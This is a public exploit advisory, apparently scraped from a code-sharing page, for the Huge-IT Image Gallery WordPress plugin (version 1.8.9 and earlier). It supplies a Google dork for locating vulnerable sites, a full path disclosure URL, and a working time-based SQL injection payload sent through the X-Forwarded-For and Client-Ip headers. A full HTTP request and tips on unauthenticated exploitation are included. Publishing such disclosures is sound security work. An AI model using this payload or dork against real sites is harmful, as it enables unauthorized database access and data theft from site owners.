扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 |
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection # Google Dork: inurl:"wp-content/plugins/gallery-images/" # Date: 12-05-2016 # Software Link: https://fr.wordpress.org/plugins/gallery-images/ # Version: 1.8.9 and prior # Exploit Author: Gwendal Le Coguic # Website: http://10degres.net # Category: webapps ##### About ##### Huge-IT Image Gallery is the best plugin to use if you want to be original with your website. ##### Full Path Disclosure ##### http://[target]/wp-content/plugins/gallery-images/gallery-images.php ##### SQL Injection ##### Headers X-Forwarded-For and Client-Ip are vulnerable. Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [target] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Client-Ip: 123.123.123.123 X-Forwarded-For: 123.123.123.123 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 89 action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100 ### Extras infos ##### The "galleryid" must be configured or try another id. You don't need to be authed to exploit the injection but the plugin must be enable. "task" parameter can be: load_images_content load_images_lightbox load_image_justified load_image_thumbnail load_blog_view Client-Ip overwrite X-Forwarded-For. Some system drop those headers. ##### References ##### https://www.owasp.org/index.php/Full_Path_Disclosure https://www.owasp.org/index.php/SQL_Injection |
体验盒子
